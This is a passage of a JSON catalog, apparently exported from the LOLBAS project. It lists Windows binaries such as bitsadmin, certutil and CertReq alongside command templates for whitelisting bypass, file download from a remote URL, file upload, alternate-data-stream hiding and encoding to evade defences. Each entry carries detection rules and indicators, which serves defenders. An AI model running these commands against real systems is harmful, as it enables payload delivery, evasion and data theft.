Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used to bypass Application Whitelisting.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:4","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe","description":"When executed, `bash.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:0","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.","usecase":"Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:1","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:2","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset","description":"Command for copying cmd.exe to another folder","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:3","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset","description":"One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Execute binary file specified. Can be used as a defensive evasion.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certoc-exe:0","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}","description":"Loads the target DLL file","usecase":"Execute code within DLL file","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certoc-exe:1","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certoc.exe -GetCACAPS {REMOTEURL:.ps1}","description":"Downloads text formatted files","usecase":"Download scripts, webshells etc.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certreq-exe:0","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}","description":"Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certreq-exe:1","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}","description":"Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.","usecase":"Upload","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:0","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:1","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>` when not.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:2","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt","description":"Download and save a .ps1 file to an Alternate Data Stream (ADS).","usecase":"Download file from Internet and save it in an NTFS Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:3","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -URL {REMOTEURL:.exe}","description":"Download and save an executable to `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>`.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:4","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Encode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Encode"],"command":"certutil -encode {PATH} {PATH:.base64}","description":"Command to encode a file using Base64","usecase":"Encode files to evade defensive measures","mitre":["T1027.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:5","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decode {PATH:.base64} {PATH}","description":"Command to decode a Base64 encoded file.","usecase":"Decode files to evade defensive measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/e